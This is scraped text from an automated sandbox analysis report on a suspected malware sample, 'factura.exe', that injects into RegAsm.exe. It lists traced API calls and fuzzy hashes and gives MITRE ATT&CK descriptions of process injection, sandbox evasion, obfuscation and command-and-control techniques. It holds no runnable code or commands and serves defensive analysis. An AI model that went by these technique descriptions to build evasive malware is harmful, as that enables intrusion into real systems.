InternetOpenA.WININET(00C021F4,00000000,00000000,00000000,00000000,00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C01E0F
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00C01E85

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c75a9d65097c32ce9deb08617b5ace6bc1ac87b684fc45183a9ca30a3cb7f84a
Instruction ID: a192859ee6556556eed5a662cf2a55a7edde77b8f74470486df6e15bd9535808
Opcode Fuzzy Hash: c75a9d65097c32ce9deb08617b5ace6bc1ac87b684fc45183a9ca30a3cb7f84a
Instruction Fuzzy Hash: CC418270240386AFEB318E54CD95FED76A9AB50740F548019FE59AE1E0D7729E84EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C01BCD, Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00C01BA3,00C01C15,00C0027E,00000000,00000000,00000000,00000000,?,00000000), ref: 00C01BE5

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b470e6cbfe30f7c8a5c45a135d7bb9f58e4fb989e99d2bc6b368ef15af969c69
Instruction ID: 3e1c9bfc8a3eb8144f6821e56c8edbbc8a814e8d6c6e06288daf7351dc5fe9ce
Opcode Fuzzy Hash: b470e6cbfe30f7c8a5c45a135d7bb9f58e4fb989e99d2bc6b368ef15af969c69
Instruction Fuzzy Hash: 94C04C707E0304BEFA3586105D57F8566169B90F00E60440977493D0C546F16951C51D

Uniqueness

Uniqueness Score: -1.00%

Function 00C006E4, Relevance: 1.3, APIs: 1, Instructions: 39
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C01D57: LdrInitializeThunk.NTDLL(00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C02266

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000369,?,00C029D5,00000000,000000FF,00000007,?,00000004,00000000), ref: 00C00773

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: 565e8dbc374c688b8b81abe07e77f0f92a72922e39d7368d97662387314c8e6e
Instruction ID: 4865fce9e047dfa55867144419f83d7996cfdba122abe270eed5ddca8a90bdd8
Opcode Fuzzy Hash: 565e8dbc374c688b8b81abe07e77f0f92a72922e39d7368d97662387314c8e6e
Instruction Fuzzy Hash: 18011430284349EFEF322FA48E46BD83B67AF41784F554104FE48690D2C77A4AA0EF16

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C02F5D, Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: c8e970f62bd2a57e1158c3822921184bcd0f6cbb7114029470c81c6675d23c57
Instruction ID: c6fc91732d4adb31bf7da4a1ecedb15e6ea47b329cc31ff2501c5d7bb56ed381
Opcode Fuzzy Hash: c8e970f62bd2a57e1158c3822921184bcd0f6cbb7114029470c81c6675d23c57
Instruction Fuzzy Hash: 9D719370A543818FDB25CF28C894759BB95AF56324F48C299D5B58F2EAC334CA42C722

Uniqueness

Uniqueness Score: -1.00%

Function 00C00E25, Relevance: .1, Instructions: 109libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00C02F6A,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C02A87

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5d9c1935f0d86af030b9bd62102cc36b891f3770d011a0f8419c7ce8f97a3ed0
Instruction ID: 1603b9c1a7f69b798b422c4e09d63f38a4d66b811cf3cbeae577cb16bcf6fc10
Opcode Fuzzy Hash: 5d9c1935f0d86af030b9bd62102cc36b891f3770d011a0f8419c7ce8f97a3ed0
Instruction Fuzzy Hash: D5314571700612AFD764AA68CC45BE5B3A9FF00360F264229FCA8E33C2CB24DC45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C00FE2, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3b66f2a0f3d4d42b6b4c2a7b931b854bcdfcf23061d2ba50fa784772e2ce0b
Instruction ID: 2b10994aa2b5053adfe68269d90993d8dfd945c0f4b00ad22a48f8bf621a25f0
Opcode Fuzzy Hash: bb3b66f2a0f3d4d42b6b4c2a7b931b854bcdfcf23061d2ba50fa784772e2ce0b
Instruction Fuzzy Hash: DD3131B0244340AFEB245F64CC49F99B395BF01324F69806AFD459B2D2C7B4D9C0EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00C02BEE, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6186af93c4180d974f5bf2389c8e4fd95fedb57eff2d5d76c7055e5283c870a7
Instruction ID: 62f56c8f9cc33d9fb7aa5da3d4c5e85a650b4e6b384621609515d1355239021f
Opcode Fuzzy Hash: 6186af93c4180d974f5bf2389c8e4fd95fedb57eff2d5d76c7055e5283c870a7
Instruction Fuzzy Hash: B6F0A0707011008FF714DF58C2C8F1DB3A2EF99750F6484A5E911CB2A2C234EE80C624

Uniqueness

Uniqueness Score: -1.00%

Function 00C01996, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 00C029BD, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4b6863cc23693e0d8a110fb9812b0a854d4ff2cb09985eb4a2135f0fc236b47
Instruction ID: 90c93bcf842074def0323cd1db6baba0c1496098558b228b413ee36ce3efb7bf
Opcode Fuzzy Hash: f4b6863cc23693e0d8a110fb9812b0a854d4ff2cb09985eb4a2135f0fc236b47
Instruction Fuzzy Hash: BAB002757556418FCA55DE19D290F4073B4FB54BA0B455494A455C7A51C264E900C910

Uniqueness

Uniqueness Score: -1.00%

Function 00C0352C, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeafa03d48bc390408c59c474862eeb80a5e8754063925e1ec4441e030f0515a
Instruction ID: 790e0d19b5fa6c94f41eff63ae6443ff61c77d8d2320338748d2a7ad44a99e0b
Opcode Fuzzy Hash: aeafa03d48bc390408c59c474862eeb80a5e8754063925e1ec4441e030f0515a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report factura.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: factura.exe PID: 7088 Parent PID: 5892

General

Chronological Activities

Analysis Process: RegAsm.exe PID: 5420 Parent PID: 7088

General

Function 0040169C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 325
COMMON

Function 00407E34, Relevance: 133.7, APIs: 57, Strings: 19, Instructions: 685
COMMON

Function 0040904F, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 128
COMMON

Function 0040A9C4, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 62
COMMON

Function 00409AFC, Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 202
COMMON

Function 004098BB, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 156
COMMON

Function 004089D8, Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 196
COMMON

Function 00409485, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 189
COMMON

Function 0040A68E, Relevance: 33.3, APIs: 16, Strings: 3, Instructions: 94
COMMON

Function 00409E55, Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 79
COMMON

Function 0040AAD5, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 88
COMMON

Function 00409270, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 123
COMMON

Function 0040A266, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 104
COMMON

Function 00408F5B, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 68
COMMON

Function 0040971F, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 67
COMMON

Function 00409FA2, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 81
COMMON

Function 0040A513, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 95
COMMON

Function 0040A416, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 56
COMMON

Function 00408D92, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 118
COMMON

Function 00408CAB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55
COMMON

Function 0040A7FA, Relevance: 13.6, APIs: 9, Instructions: 124
COMMON

Function 0040981C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39
COMMON

Function 0040A102, Relevance: 12.1, APIs: 8, Instructions: 85
COMMON

Function 0040ACBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Function 0040AD02, Relevance: 9.0, APIs: 6, Instructions: 31
COMMON

Function 00C001DE, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
nativethreadCOMMON

Function 00C00219, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87
nativethreadCOMMON

Function 00C00AE8, Relevance: 1.9, APIs: 1, Instructions: 400
COMMON

Function 00C035C9, Relevance: 1.6, APIs: 1, Instructions: 99
filenetworkCOMMON

Function 00C01D57, Relevance: 1.5, APIs: 1, Instructions: 38
libraryCOMMON

Function 00C02A2C, Relevance: 1.5, APIs: 1, Instructions: 38
libraryCOMMON